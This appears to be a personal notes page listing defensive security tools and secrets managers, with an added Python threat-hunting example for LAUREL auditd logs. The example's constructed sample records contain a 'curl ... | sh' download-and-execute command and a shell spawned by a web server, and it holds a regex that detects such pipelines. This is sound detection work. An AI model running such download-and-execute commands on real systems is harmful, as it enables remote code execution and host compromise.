Defense
I've been collecting some of these as well, just need to place those links/notes in their home.
- Laurel
  - auditd logs in JSON format to make SIEM ingestion/analysis easier
- BPFDoor Scanner
  - Check for presence of BPFDoor implant
- Linux-CatScale
  - Collect info from Linux hosts
  - See this article about the tool
- malwoverview
  - First-response triage tool for malware samples, URLs, IPs, etc.
- seccomp-tools
  - Dump, disassemble and emulate seccomp-BPF filters
- bpfdoor-scanner
  - Scan for hosts compromised by the BPFDoor implant
- bpf-hookdetect
  - Detect syscall hooking w/ eBPF
- cowrie
  - SSH + telnet honeypot
- threatest
  - End-to-end TTP tests
  - Also see: Introducing Threatest, a Go framework for end-to-end testing of threat detection rules
- linux-elf-binary-signer
- email-header-analyzer
- rip_raw
  - Analyze memory of compromised Linux systems
- Melody
  - Internet sensor built for CTI
- Digital Forensics Guide
- Ghidrathon
  - Python 3 support for Ghidra
- HardeningKitty
  - Checks + hardens Windows config
- windows_hardening
  - Windows hardening settings + config
- mdec
  - Cross-compare output of multiple decompilers
- dissect
  - Python DFIR framework + libraries for parsing disk images and forensic artifacts that are otherwise hard to find/use
- PowerHunt
  - Threat-hunting PowerShell module to (remotely) identify IOCs at scale based on artifacts associated w/ MITRE ATT&CK techniques
- Techniques In Email Forensic Analysis
- Protecting Against Privileged Credential Sprawl (AD)
- Flare VM
  - Mandiant's Windows-based distro for malware analysis, IR, pentesting, etc.
- Userland Rootkits are Lame
  - Analyzing Linux userland rootkit tactics + defense measures
  - Inspired by Symbiote rootkit analysis
- Live-patching security vulnerabilities inside the Linux kernel with eBPF Linux Security Module | Cloudflare
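Added example for the Laurel entry above (my own code, not Laurel's and not from the original notes): a small hunt over LAUREL-style execve records that flags a shell spawned by a web-server process and a `curl ... | sh` download-and-execute pipeline. The three records are constructed, not captured from a real host; the field names used (`ID`, `SYSCALL.SYSCALL`, `SYSCALL.exe`, the `SYSCALL.PPID` parent enrichment, `EXECVE.ARGV`) follow LAUREL's documented JSON layout as I recall it, so treat the exact nesting as an assumption and check it against the output of your version. The point it makes: because LAUREL hands you `ARGV` as a decoded list and the parent process inline, a rule that needs hex-decoding and multi-record correlation on raw auditd output becomes a few lines.

```python
"""Hunt over LAUREL-style auditd JSON for execve events worth a second look.

Added example; not part of the LAUREL project. Record layout (one JSON object
per line; ID, SYSCALL.SYSCALL, SYSCALL.exe, SYSCALL.PPID parent enrichment,
EXECVE.ARGV) is assumed from LAUREL's documented output; verify against yours.
"""
from __future__ import annotations

import json
import re
from typing import Iterator

# Constructed sample records, NOT captured from a real host.
SAMPLE_LINES = """
{"ID":"1700000000.100:201","SYSCALL":{"arch":"0xc000003e","SYSCALL":"execve","success":"yes","pid":4021,"ppid":1337,"uid":33,"euid":33,"comm":"bash","exe":"/usr/bin/bash","PPID":{"EVENT_ID":"1699999999.900:190","comm":"apache2","exe":"/usr/sbin/apache2","ppid":1}},"EXECVE":{"argc":3,"ARGV":["bash","-c","curl http://203.0.113.5/x.sh | sh"]},"CWD":{"cwd":"/var/www"}}
{"ID":"1700000000.200:202","SYSCALL":{"arch":"0xc000003e","SYSCALL":"execve","success":"yes","pid":4022,"ppid":2001,"uid":1000,"euid":1000,"comm":"ls","exe":"/usr/bin/ls","PPID":{"EVENT_ID":"1699999999.950:195","comm":"bash","exe":"/usr/bin/bash","ppid":1990}},"EXECVE":{"argc":2,"ARGV":["ls","-la"]},"CWD":{"cwd":"/home/alice"}}
{"ID":"1700000000.300:203","SYSCALL":{"arch":"0xc000003e","SYSCALL":"execve","success":"yes","pid":4023,"ppid":1337,"uid":33,"euid":33,"comm":"sh","exe":"/usr/bin/dash","PPID":{"EVENT_ID":"1699999999.900:190","comm":"apache2","exe":"/usr/sbin/apache2","ppid":1}},"EXECVE":{"argc":2,"ARGV":["sh","-i"]},"CWD":{"cwd":"/"}}
"""

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
WEB_SERVERS = {"apache2", "httpd", "nginx", "php-fpm"}
# "curl ... | sh" or "wget ... | bash" inside a single argv element
DOWNLOAD_PIPE = re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sh|bash)\b")


def parse_events(text: str) -> Iterator[dict]:
    """Yield one event dict per non-empty line (LAUREL writes newline-delimited JSON)."""
    for line in text.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def _basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def classify(event: dict) -> list:
    """Return the names of the rules an execve event trips (empty list if none)."""
    hits = []
    sc = event.get("SYSCALL") or {}
    if sc.get("SYSCALL") != "execve":
        return hits
    # EXECVE.ARGV is already a decoded list: raw auditd hex-encodes any argument
    # containing spaces and splits long argv across several EXECVE records.
    argv = (event.get("EXECVE") or {}).get("ARGV") or []
    # Parent enrichment assumed to live under SYSCALL.PPID as a dict.
    parent = sc.get("PPID") if isinstance(sc.get("PPID"), dict) else {}

    if _basename(sc.get("exe", "")) in SHELLS and parent.get("comm") in WEB_SERVERS:
        hits.append("web_server_spawned_shell")
    if any(DOWNLOAD_PIPE.search(arg) for arg in argv):
        hits.append("download_and_execute")
    return hits


def hunt(text: str) -> dict:
    """Map event ID -> rule hits for every event that trips at least one rule."""
    findings = {}
    for event in parse_events(text):
        hits = classify(event)
        if hits:
            findings[event["ID"]] = hits
    return findings


if __name__ == "__main__":
    for event_id, hits in hunt(SAMPLE_LINES).items():
        print(event_id, ", ".join(hits))
```

Run it as-is to see the two flagged events; to use it on a real host, feed it `/var/log/laurel/audit.log` (or wherever your LAUREL config writes) and tune `WEB_SERVERS` and `SHELLS` to your fleet. The `ls` event from an interactive user shell is the negative case and produces no hit.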
SDLC
- Mozilla SOPS
  - Edits/encrypts the values (not the keys) in YAML, JSON, ENV and INI files so secrets can be committed to source control without leaking credentials
  - For Kubernetes: KSOPS
- Doppler
  - Secrets manager
- BitWarden
  - Open-source password manager
  - TODO: Does this integrate with source control? Might be mistaken